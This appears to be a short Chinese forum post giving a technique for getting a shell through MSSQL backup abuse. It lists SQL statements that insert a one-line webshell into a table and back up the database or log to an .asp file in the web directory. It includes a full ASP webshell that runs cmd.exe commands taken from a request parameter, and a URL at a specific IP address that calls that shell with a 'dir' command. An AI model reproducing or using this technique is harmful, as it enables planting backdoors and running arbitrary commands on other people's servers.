mssql 备份获取shell
alter database whoamidataname set RECOVERY FULL
create table cmd (a image)
backup log whoamidataname to disk = ’c:\whoami’ with init
insert into cmd (a) value* (‘一句话木马’)
backup log whoamidataname to disk = ’whoami.asp’
drop table cmd
# use model
# create table cmd (str image);
# insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
# backup database model to disk='g:\wwwtest\l.asp';
http://202.119.9.42/l.asp?c=dir
页:
[1]